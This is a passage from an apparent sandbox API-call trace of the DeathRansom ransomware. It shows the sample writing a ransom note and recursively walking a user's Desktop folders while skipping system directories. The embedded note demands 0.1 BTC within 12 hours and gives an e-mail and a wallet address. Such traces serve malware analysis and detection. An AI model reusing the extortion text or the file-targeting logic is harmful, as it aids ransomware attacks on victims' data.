out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\read_me.txt") returned 53 [0075.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0075.173] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.173] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.174] CloseHandle (hObject=0x7a0) returned 1 [0075.174] GetProcessHeap () returned 0x4f10000 [0075.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b20098 | out: hHeap=0x4f10000) returned 1 [0075.174] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7078770, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x7078770, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Desktop", cAlternateFileName="")) returned 1 [0075.174] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 41 [0075.174] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0075.174] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0075.174] StrStrW (lpFirst="desktop", lpSrch="programdata") returned 0x0 [0075.174] StrStrW (lpFirst="desktop", lpSrch="$recycle.bin") returned 0x0 [0075.174] StrStrW (lpFirst="desktop", lpSrch="program files") returned 0x0 [0075.174] StrStrW (lpFirst="desktop", lpSrch="windows") returned 0x0 [0075.174] StrStrW (lpFirst="desktop", lpSrch="all users") returned 0x0 [0075.175] StrStrW (lpFirst="desktop", lpSrch="appdata") returned 0x0 [0075.175] GetProcessHeap () returned 0x4f10000 [0075.175] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b20098 [0075.175] lstrcpyW (in: lpString1=0x8b20098, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0075.175] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 39 [0075.175] QueueUserWorkItem (Function=0x40a710, Context=0x8b20098, Flags=0x0) returned 1 [0075.175] GetProcessHeap () returned 0x4f10000 [0075.175] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b300a0 [0075.176] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned 43 [0075.176] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7078770, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x7078770, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0075.176] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 43 [0075.176] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.176] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.176] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7078770, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x7078770, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.176] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\..") returned 44 [0075.176] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.176] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ca0bd0, ftCreationTime.dwHighDateTime=0x1d4d0f5, ftLastAccessTime.dwLowDateTime=0xb35569f0, ftLastAccessTime.dwHighDateTime=0x1d4d0be, ftLastWriteTime.dwLowDateTime=0xb35569f0, ftLastWriteTime.dwHighDateTime=0x1d4d0be, nFileSizeHigh=0x0, nFileSizeLow=0x11b9, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="0N-rV-LBaIjM3NXE.gif", cAlternateFileName="0N-RV-~1.GIF")) returned 1 [0075.176] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0N-rV-LBaIjM3NXE.gif") returned 62 [0075.176] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd129f40, ftCreationTime.dwHighDateTime=0x1d4d36e, ftLastAccessTime.dwLowDateTime=0x42ea9cd0, ftLastAccessTime.dwHighDateTime=0x1d4cf42, ftLastWriteTime.dwLowDateTime=0x42ea9cd0, ftLastWriteTime.dwHighDateTime=0x1d4cf42, nFileSizeHigh=0x0, nFileSizeLow=0x18d4f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1QQBxYdUEBz.mp3", cAlternateFileName="1QQBXY~1.MP3")) returned 1 [0075.176] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1QQBxYdUEBz.mp3") returned 57 [0075.176] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b49ac0, ftCreationTime.dwHighDateTime=0x1d4c9ad, ftLastAccessTime.dwLowDateTime=0x982967b0, ftLastAccessTime.dwHighDateTime=0x1d4cc74, ftLastWriteTime.dwLowDateTime=0x982967b0, ftLastWriteTime.dwHighDateTime=0x1d4cc74, nFileSizeHigh=0x0, nFileSizeLow=0x117ce, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="3Y3KdQk.jpg", cAlternateFileName="")) returned 1 [0075.176] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3Y3KdQk.jpg") returned 53 [0075.176] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22aa8ca0, ftCreationTime.dwHighDateTime=0x1d4cb7d, ftLastAccessTime.dwLowDateTime=0x5443b720, ftLastAccessTime.dwHighDateTime=0x1d4c6f8, ftLastWriteTime.dwLowDateTime=0x5443b720, ftLastWriteTime.dwHighDateTime=0x1d4c6f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="4aQclz9QavwtjC5QkBV", cAlternateFileName="4AQCLZ~1")) returned 1 [0075.176] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV") returned 61 [0075.176] lstrcmpW (lpString1="4aQclz9QavwtjC5QkBV", lpString2="..") returned 1 [0075.176] lstrcmpW (lpString1="4aQclz9QavwtjC5QkBV", lpString2=".") returned 1 [0075.176] StrStrW (lpFirst="4aqclz9qavwtjc5qkbv", lpSrch="programdata") returned 0x0 [0075.176] StrStrW (lpFirst="4aqclz9qavwtjc5qkbv", lpSrch="$recycle.bin") returned 0x0 [0075.176] StrStrW (lpFirst="4aqclz9qavwtjc5qkbv", lpSrch="program files") returned 0x0 [0075.176] StrStrW (lpFirst="4aqclz9qavwtjc5qkbv", lpSrch="windows") returned 0x0 [0075.176] StrStrW (lpFirst="4aqclz9qavwtjc5qkbv", lpSrch="all users") returned 0x0 [0075.177] StrStrW (lpFirst="4aqclz9qavwtjc5qkbv", lpSrch="appdata") returned 0x0 [0075.177] GetProcessHeap () returned 0x4f10000 [0075.177] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b400a8 [0075.177] lstrcpyW (in: lpString1=0x8b400a8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV" [0075.177] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 40 [0075.177] QueueUserWorkItem (Function=0x40a710, Context=0x8b400a8, Flags=0x0) returned 1 [0075.177] GetProcessHeap () returned 0x4f10000 [0075.177] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b500b0 [0075.178] wnsprintfW (in: pszDest=0x8b500b0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\*") returned 63 [0075.178] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22aa8ca0, ftCreationTime.dwHighDateTime=0x1d4cb7d, ftLastAccessTime.dwLowDateTime=0x5443b720, ftLastAccessTime.dwHighDateTime=0x1d4c6f8, ftLastWriteTime.dwLowDateTime=0x5443b720, ftLastWriteTime.dwHighDateTime=0x1d4c6f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0075.178] wnsprintfW (in: pszDest=0x8b500b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\.") returned 63 [0075.178] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.179] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.179] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22aa8ca0, ftCreationTime.dwHighDateTime=0x1d4cb7d, ftLastAccessTime.dwLowDateTime=0x5443b720, ftLastAccessTime.dwHighDateTime=0x1d4c6f8, ftLastWriteTime.dwLowDateTime=0x5443b720, ftLastWriteTime.dwHighDateTime=0x1d4c6f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.179] wnsprintfW (in: pszDest=0x8b500b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\..") returned 64 [0075.179] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.179] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd3fa1e0, ftCreationTime.dwHighDateTime=0x1d4cc4b, ftLastAccessTime.dwLowDateTime=0x93b8e3c0, ftLastAccessTime.dwHighDateTime=0x1d4c87a, ftLastWriteTime.dwLowDateTime=0x93b8e3c0, ftLastWriteTime.dwHighDateTime=0x1d4c87a, nFileSizeHigh=0x0, nFileSizeLow=0xaad1, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="6Moq2t5E7ltI2YT.mp4", cAlternateFileName="6MOQ2T~1.MP4")) returned 1 [0075.179] wnsprintfW (in: pszDest=0x8b500b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\6Moq2t5E7ltI2YT.mp4") returned 81 [0075.179] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cf13e40, ftCreationTime.dwHighDateTime=0x1d4d093, ftLastAccessTime.dwLowDateTime=0x6f974510, ftLastAccessTime.dwHighDateTime=0x1d4d386, ftLastWriteTime.dwLowDateTime=0x6f974510, ftLastWriteTime.dwHighDateTime=0x1d4d386, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="j9-MN6", cAlternateFileName="")) returned 1 [0075.179] wnsprintfW (in: pszDest=0x8b500b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6") returned 68 [0075.179] lstrcmpW (lpString1="j9-MN6", lpString2="..") returned 1 [0075.179] lstrcmpW (lpString1="j9-MN6", lpString2=".") returned 1 [0075.179] StrStrW (lpFirst="j9-mn6", lpSrch="programdata") returned 0x0 [0075.179] StrStrW (lpFirst="j9-mn6", lpSrch="$recycle.bin") returned 0x0 [0075.179] StrStrW (lpFirst="j9-mn6", lpSrch="program files") returned 0x0 [0075.179] StrStrW (lpFirst="j9-mn6", lpSrch="windows") returned 0x0 [0075.179] StrStrW (lpFirst="j9-mn6", lpSrch="all users") returned 0x0 [0075.179] StrStrW (lpFirst="j9-mn6", lpSrch="appdata") returned 0x0 [0075.179] GetProcessHeap () returned 0x4f10000 [0075.179] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b600b8 [0075.180] lstrcpyW (in: lpString1=0x8b600b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6" [0075.180] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 41 [0075.180] QueueUserWorkItem (Function=0x40a710, Context=0x8b600b8, Flags=0x0) returned 1 [0075.180] GetProcessHeap () returned 0x4f10000 [0075.180] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b700c0 [0075.181] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\*") returned 70 [0075.181] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\*", lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cf13e40, ftCreationTime.dwHighDateTime=0x1d4d093, ftLastAccessTime.dwLowDateTime=0x6f974510, ftLastAccessTime.dwHighDateTime=0x1d4d386, ftLastWriteTime.dwLowDateTime=0x6f974510, ftLastWriteTime.dwHighDateTime=0x1d4d386, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0075.245] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\.") returned 70 [0075.245] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.245] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.245] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cf13e40, ftCreationTime.dwHighDateTime=0x1d4d093, ftLastAccessTime.dwLowDateTime=0x6f974510, ftLastAccessTime.dwHighDateTime=0x1d4d386, ftLastWriteTime.dwLowDateTime=0x6f974510, ftLastWriteTime.dwHighDateTime=0x1d4d386, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.245] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\..") returned 71 [0075.245] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.245] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5feadc80, ftCreationTime.dwHighDateTime=0x1d4c79c, ftLastAccessTime.dwLowDateTime=0x82b86f30, ftLastAccessTime.dwHighDateTime=0x1d4c69c, ftLastWriteTime.dwLowDateTime=0x82b86f30, ftLastWriteTime.dwHighDateTime=0x1d4c69c, nFileSizeHigh=0x0, nFileSizeLow=0x4b90, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="amZv2Z0wxoZS.flv", cAlternateFileName="AMZV2Z~1.FLV")) returned 1 [0075.245] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\amZv2Z0wxoZS.flv") returned 85 [0075.245] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f8f0e90, ftCreationTime.dwHighDateTime=0x1d4c865, ftLastAccessTime.dwLowDateTime=0x902beec0, ftLastAccessTime.dwHighDateTime=0x1d4c701, ftLastWriteTime.dwLowDateTime=0x902beec0, ftLastWriteTime.dwHighDateTime=0x1d4c701, nFileSizeHigh=0x0, nFileSizeLow=0x18992, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="d3xNIviLk0Lwv1A.mp3", cAlternateFileName="D3XNIV~1.MP3")) returned 1 [0075.245] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\d3xNIviLk0Lwv1A.mp3") returned 88 [0075.245] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a309220, ftCreationTime.dwHighDateTime=0x1d4ca67, ftLastAccessTime.dwLowDateTime=0xfe22dc10, ftLastAccessTime.dwHighDateTime=0x1d4cd67, ftLastWriteTime.dwLowDateTime=0xfe22dc10, ftLastWriteTime.dwHighDateTime=0x1d4cd67, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OFbSLjMg5F ypHpxq3Lw", cAlternateFileName="OFBSLJ~1")) returned 1 [0075.245] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw") returned 89 [0075.245] lstrcmpW (lpString1="OFbSLjMg5F ypHpxq3Lw", lpString2="..") returned 1 [0075.245] lstrcmpW (lpString1="OFbSLjMg5F ypHpxq3Lw", lpString2=".") returned 1 [0075.245] StrStrW (lpFirst="ofbsljmg5f yphpxq3lw", lpSrch="programdata") returned 0x0 [0075.245] StrStrW (lpFirst="ofbsljmg5f yphpxq3lw", lpSrch="$recycle.bin") returned 0x0 [0075.245] StrStrW (lpFirst="ofbsljmg5f yphpxq3lw", lpSrch="program files") returned 0x0 [0075.245] StrStrW (lpFirst="ofbsljmg5f yphpxq3lw", lpSrch="windows") returned 0x0 [0075.245] StrStrW (lpFirst="ofbsljmg5f yphpxq3lw", lpSrch="all users") returned 0x0 [0075.245] StrStrW (lpFirst="ofbsljmg5f yphpxq3lw", lpSrch="appdata") returned 0x0 [0075.245] GetProcessHeap () returned 0x4f10000 [0075.245] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b800c8 [0075.246] lstrcpyW (in: lpString1=0x8b800c8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw" [0075.246] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 42 [0075.246] QueueUserWorkItem (Function=0x40a710, Context=0x8b800c8, Flags=0x0) returned 1 [0075.246] GetProcessHeap () returned 0x4f10000 [0075.246] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b900d0 [0075.247] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\*") returned 91 [0075.247] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\*", lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a309220, ftCreationTime.dwHighDateTime=0x1d4ca67, ftLastAccessTime.dwLowDateTime=0xfe22dc10, ftLastAccessTime.dwHighDateTime=0x1d4cd67, ftLastWriteTime.dwLowDateTime=0xfe22dc10, ftLastWriteTime.dwHighDateTime=0x1d4cd67, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfea28 [0075.247] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\.") returned 91 [0075.247] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.247] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.247] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a309220, ftCreationTime.dwHighDateTime=0x1d4ca67, ftLastAccessTime.dwLowDateTime=0xfe22dc10, ftLastAccessTime.dwHighDateTime=0x1d4cd67, ftLastWriteTime.dwLowDateTime=0xfe22dc10, ftLastWriteTime.dwHighDateTime=0x1d4cd67, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.247] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\..") returned 92 [0075.247] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.247] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b61770, ftCreationTime.dwHighDateTime=0x1d4d0a5, ftLastAccessTime.dwLowDateTime=0x43392fa0, ftLastAccessTime.dwHighDateTime=0x1d4ca2c, ftLastWriteTime.dwLowDateTime=0x43392fa0, ftLastWriteTime.dwHighDateTime=0x1d4ca2c, nFileSizeHigh=0x0, nFileSizeLow=0x77ba, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="-sIkef49wnJO.bmp", cAlternateFileName="-SIKEF~1.BMP")) returned 1 [0075.247] wnsprintfW (in: 